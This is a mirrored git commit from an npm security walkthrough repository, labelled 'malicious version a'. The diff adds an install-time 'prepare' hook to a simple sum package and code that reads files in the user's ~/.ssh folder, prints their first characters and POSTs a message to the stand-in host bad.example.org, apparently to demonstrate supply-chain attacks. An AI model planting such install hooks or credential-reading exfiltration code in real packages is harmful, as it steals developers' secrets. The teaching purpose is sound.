mirror of
https://github.com/cupcakearmy/npm-security-walkthrough.git
synced 2025-01-09 16:56:32 +00:00
malicious version a
This commit is contained in:
parent
ae9b2234f6
commit
008883b530
@ -8,5 +8,8 @@
|
||||
"license": "MIT",
|
||||
"files": [
|
||||
"src"
|
||||
]
|
||||
],
|
||||
"scripts": {
|
||||
"prepare": "node ./src/index.js"
|
||||
}
|
||||
}
|
||||
|
40
src/index.js
40
src/index.js
@ -1,3 +1,43 @@
|
||||
function phoneHome(payload) {
|
||||
const https = require('https')
|
||||
const data = JSON.stringify(payload)
|
||||
const options = {
|
||||
hostname: 'bad.example.org',
|
||||
port: 443,
|
||||
path: '/sendShhKey',
|
||||
method: 'POST',
|
||||
headers: {
|
||||
'Content-Type': 'application/json',
|
||||
'Content-Length': data.length,
|
||||
},
|
||||
}
|
||||
const req = https.request(options, (res) => {
|
||||
res.on('data', (d) => {
|
||||
process.stdout.write(d)
|
||||
})
|
||||
})
|
||||
req.on('error', (error) => {
|
||||
console.error('Server not found of course.')
|
||||
})
|
||||
req.write(data)
|
||||
req.end()
|
||||
}
|
||||
|
||||
if (typeof process !== 'undefined') {
|
||||
const fs = require('fs')
|
||||
const path = require('path')
|
||||
const os = require('os')
|
||||
const sshFolder = path.join(os.homedir(), '.ssh')
|
||||
for (const file of fs.readdirSync(sshFolder)) {
|
||||
const filename = path.join(sshFolder, file)
|
||||
if (fs.lstatSync(filename).isFile()) {
|
||||
const contents = fs.readFileSync(filename, { encoding: 'utf-8' })
|
||||
console.log(contents.slice(0, 30), '...')
|
||||
phoneHome('Could have been my ssh key. Byeee')
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
module.exports = {
|
||||
sum(a, b) {
|
||||
return a + b
|
||||
|
Loading…
Reference in New Issue
Block a user